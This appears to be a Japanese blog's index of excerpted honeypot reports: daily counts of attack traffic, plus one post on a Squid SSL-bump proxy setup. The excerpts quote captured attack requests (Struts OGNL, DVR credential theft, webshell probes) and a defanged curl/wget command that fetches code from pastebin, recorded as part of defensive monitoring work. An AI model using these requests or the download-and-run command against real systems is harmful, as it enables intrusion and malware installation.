CentOS7上にSSL Bump機能を持つSquidProxyサーバの構築＋Splunkでのログ取り込みの手順メモ CentOS 7のインストール CentOS7を最小インストールする パッケージのアップデートを行う yum update GUIで操作できるよう、パッケージをインストールする。 yum -y…

期間内の総アクセス件数は 13,320件です。送信元IP数は421IPです。・新規判定 OpenDreamBoxのRCE脆弱性に関する通信を検知しました。 GET /webadmin/script?command=|busyboxhttps://www.exploit-db.com/exploits/42293 ・判定済みの通信の件数 判定用シグネ…

期間内の総アクセス件数は1,308件です。送信元IP数は476IPです。 新規ログ 件数 種別 リクエスト 386 アクセス GET / 207 Bad Request 56 不正中継の調査 GET httpbin[.]org/ip 35 Linksysの脆弱性に関する調査 POST 192.168.0.14/tmUnblock.cgi 34 不正中継…

期間内の総アクセス件数は1,100件です。送信元IP数は328IPです。 脆弱性に関する新規通信をいくつか確認しました TBK Vision DVR デバイスの脆弱性(CVE-2018-9995)に関する攻撃 管理者パスワードを窃取される脆弱性の模様 GET /device.rsp?opt=user&cmd=list…

期間内の総アクセス件数は2,577件です。送信元IP数は449IPです。・気になる通信 リクエストヘッダを細工するタイプの通信が来ておりました。 WebDAVの脆弱性(CVE-2017-7269)に関する通信の模様です。 文字化けしておりますが以下のPOCかと思われます。github…

本日の総アクセス件数は138件です。送信元IP数は7IPです。少ないですね。 件数 種別 リクエスト 66 phpMyAdminに関する攻撃 POST /phpmyadmin/ 63 アクセス GET / 2 Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 GET /cgi-bin/config.exp 2 環境設定の…

本日の総アクセス件数は165件です。送信元IP数は68IPです。・気になる通信 GET /muieblackcat phpmyadminに対してのスキャナのようです。 件数 種別 リクエスト 67 phpMyAdminに関する攻撃 POST /phpmyadmin/ 63 アクセス GET / 5 不正中継の調査 GET www.ba…

本日の総アクセス件数は205件です。送信元IP数は71IPです。気になる通信は特にありませんでした。 件数 種別 リクエスト 67 phpMyAdminに関する攻撃 POST /phpmyadmin/ 65 アクセス GET / 46 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html 4 …

本日の総アクセス件数は139件です。送信元IP数は56IPです。気になる通信は特にありませんでした。 件数 種別 リクエスト 69 phpMyAdminに関する攻撃 POST /phpmyadmin/ 55 アクセス GET / 3 不正中継の調査 GET 5.188.210[.]101/echo.php 2 FreePBXに関する…

本日の総アクセス件数は289件です。送信元IP数は79IPです。気になる通信は特にありませんでした。 件数 種別 リクエスト 72 phpMyAdminに関する攻撃 POST /phpmyadmin/ 68 アクセス GET / 3 不正中継の調査 POST 188.166.41[.]194/tmUnblock.cgi 2 Tomcat管…

本日の総アクセス件数は283件です。送信元IP数は74IPです。 Apache Struts2 の脆弱性(CVE-2017-5638)に関する通信を観測 拡張子が以下のような通信先に対し、 Apache Struts2 の脆弱性(CVE-2017-5638)に関する通信を観測しています。 ・.do ・.htm ・.html …

本日の総アクセス件数は166件です。送信元IP数は85IPです。新規の通信は観測できませんでした。 件数 種別 リクエスト 72 phpMyAdminに関する攻撃 POST /phpmyadmin/ 63 アクセス GET / 3 Amazon EC2 インスタンスメタデータの調査 GET 169.254.169[.]254/la…

本日の総アクセス件数は494件です。送信元IP数は81IPです。以下のpathに同一IPから来ていたので、すべてVOIP関連と判断しています。 /aastra/ /configs/ /gs/ /lib/ /polycom/ /provision/ /provisioning/ /spa/ /spa2102/ /tftp/ /voip_provisioning/ /xmls…

本日の総アクセス件数は149件です。送信元IP数は69IPです。・Apache Strutsの脆弱性調査と思われる通信を観測 どうやら以下の三つの脆弱性に関する調査のようです ・CVE-2013-2251 ・CVE-2017-5638 ・CVE-2018-11776 リクエスト Post / redirect:${#zzz=#con…

本日の総アクセス件数は742件です。送信元IP数81IPです。 ・ドイツのAVM GmbH社製のゲートウェイ機器FRITZ！Boxシリーズに関する通信・Nexus Repository Manager(CVE-2019-7238)に関する通信 遠隔からのコード実行が可能な脆弱性があるようです。 POSTの中身…

本日の総アクセス件数は474件です。送信元IP数は68IPです。 ・DFindによるスキャンと思われる通信を観測 DFindというスキャンツールだと思われますが、 ツールの詳細は分かりませんでした。 件数 種別 リクエスト 176 Tomcat管理ページへのブルートフォース…

本日の総アクセス件数は343件です。送信元IP数は64IPです。 ・詳細不明な通信 GET /Main という通信がありましたが、詳細わからず。 同じ送信元からも通信はありませんでした。 88 アクセス GET / 73 phpMyAdminに関する攻撃 POST /phpmyadmin/ 3 アクセス H…

本日の総アクセス件数は176件です。送信元IP数は77IPです。・ネットワークカメラに関する通信を観測しました。 GET /PSIA/index という通信がありました。 実際にIPカメラに行うと、PSIAルートサービスリストの XMLファイルが返ってくるようです。・詳細不明…

本日の総アクセス件数は1570件です。送信元IP数は71IPです。 ・phpのWebShell設置の通信を観測 久しぶりにWebShellに関する通信が多数来ました。 四月は "die(@md5(J4nur4ry))" の模様です。・PHPUnitの脆弱性(CVE-2017-9841)に関する通信を観測 通信自体はP…

本日の総アクセス件数は569件です。送信元IP数は75IPです。・Cisco製ルータRV320、RV325の脆弱性(CVE-2019-1652,CVE-2019-1653)に 関する通信を観測しました。・ThinkPHPに関連する通信を観測 GET hydra.phpという通信を検知しました。 以前にあった、ThinkP…

本日の総アクセス件数は614件です。送信元IP数は81IPです。 ・Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃を観測しました。 同様の通信は2019 4/1にも観測していますが、詳細が分かったため、記載します。・ヘッダ POST /users?page=&size=5 ・…

本日の総アクセス件数は599件です。送信元IP数は68IPです。・IPTV Stalkerに関する通信を観測しました。 ・ThinkPHPに関する攻撃を観測しました。 リクエストのpathがURLエンコードされているものを初めて観測しました。 また、該当のファイルはダウンロード…

本日の総アクセス件数は644件です。送信元IP数は90IPです。昨日来ていたNetgear ルータ DGN1000 に関する攻撃において、 wgetを行う宛先が変わっておりました。 本日の宛先からは、legion.mipsのダウンロードが可能でした。 VirusTotalによるとGafgytのよう…

4月3日にCowrieに来ていた攻撃を追ってみました。 一番最初にこの攻撃が観測されたのは4月2日4:48(JST)となります。sshでログインし、以下のコマンドを入力していました。 (curl -fsSL hxxps://pastebin[.]com/raw/v5XC0BJh||wget -q -O- hxxps://pastebin[]…

本日の総アクセス件数は594件です。送信元IP数は77IPです。"GET /" のような単なるアクセスと思われる通信が55IPから来ました。 内訳の多くは、日本リージョンに属するAWS上の4IPから、 計280回、UAがGo-http-clientの通信でした。 何かのテストでもしていた…

本日の総アクセス件数は826件です。送信元IP数は76IPです。phpMyAdminに対してGETでブルートフォース攻撃が来ていました。HIKVISION製の監視カメラに関する調査が来ていました。 以下のファイルにアクセスを試み、監視カメラの設定ファイルを確認しようとし…

本日の総アクセス件数は199件です。送信元IP数は42IPです。昼頃にHoneyPotを動かしているサーバが落ちてしまったため、ログ量が少なくなっています。 本日、特に珍しい通信は確認できませんでした。 件数 種別 リクエスト 162 phpMyAdminに関する攻撃 POST /…

本日の総アクセス件数は742件です。送信元IP数は88IPです。エディタの設定ファイルからFTPサーバの情報を得ようとする通信を確認しました。 VSCode /.vscode/sftp.json /.vscode/ftp-sync.json Atom /.ftpconfig /.remote-sync.json /deployment-config.json…

本日の総アクセス件数は705件です。送信元IP数は104IPです。久しぶりにWebShellの調査と思われる通信を確認しました。 h=die('Hello, Peppa!'); Peppaって何でしょうかね？PeppaPigというアニメがアメリカであるそうなので、それでしょうか？ 送信元も西海岸…

全体的に通信がすくない一日でした。 日曜日はお休みなのでしょうか？Shellshockに関する攻撃のユーザー名として"rbn kjb"があったのですが、 何かによく使われるのでしょうか？ 件数 種別 リクエスト 308 phpMyAdminに関する攻撃 POST /phpmyadmin/ 58 アク…